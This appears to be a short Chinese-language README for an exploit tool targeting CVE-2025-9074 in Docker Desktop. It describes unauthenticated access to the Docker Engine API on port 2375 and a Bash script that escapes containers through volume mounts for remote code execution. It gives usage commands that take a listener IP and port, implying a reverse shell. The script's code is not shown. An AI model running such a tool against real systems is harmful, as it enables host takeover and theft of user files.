Docker Desktop 中的一个严重 CVE-2025-9074 漏洞,使得本地运行的 Linux 容器能够通过默认子网 (192.168.65.7:2375) 连接 Docker Engine API。无论是否启用增强容器隔离 (ECI) 或 TCP 暴露设置,该问题都会持续存在。CVE-2025-9074 的概念验证利用代码已公开。该漏洞可能允许未经授权访问主机系统上的用户文件。因此,风险等级被评定为高风险。
一个独立的 Bash 脚本,用于利用暴露的 Docker API(通常为 2375 端口)而不需要认证。该工具通过卷挂载自动化容器逃逸,实现远程代码执行。
curl 和 grep 等标准工具。无需外部二进制文件或第三方工具。chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>
